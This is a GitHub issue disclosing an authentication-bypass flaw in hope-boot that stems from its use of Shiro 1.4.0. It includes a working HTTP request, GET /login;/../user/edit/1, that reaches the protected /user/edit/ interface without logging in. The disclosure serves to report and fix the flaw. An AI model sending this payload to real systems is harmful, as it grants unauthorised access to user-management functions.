Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

There is an Incorrect Access Control vulnerability in hope-boot #86

Open
RacerZ-fighting opened this issue Nov 24, 2024 · 0 comments
Open

There is an Incorrect Access Control vulnerability in hope-boot #86

RacerZ-fighting opened this issue Nov 24, 2024 · 0 comments

Comments

@RacerZ-fighting
Copy link

[Suggested description]
hope-boot was found to have an Incorrect Access Control vulnerability due to the use of an insecure version of Shiro.

[Vulnerability Type]
Incorrect access control

[Vendor of Product]
https://github.com/java-aodeng/hope-boot

[Affected Product Code Base]
all version (<= 1.0.0-release)

[Affected Component]
/user/edit/ interface

[Attack Type]
Remote

[Vulnerability details]
Send the payload below to the interface /user/edit/

GET /login;/../user/edit/1 HTTP/1.1
Host: localhost:8886
User-Agent: Apifox/1.0.0 (https://apifox.com)
Accept: */*
Host: localhost:8886
Connection: keep-alive
image image [Cause of vulnerability] Shiro is used for authentication in hope-boot, but version 1.4.0 contains an insecure implementation image Meanwhile, hope-boot includes some interfaces configured without permission requirements, enabling the exploitation of vulnerabilities in Shiro's implementation to achieve authentication bypass. image
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@RacerZ-fighting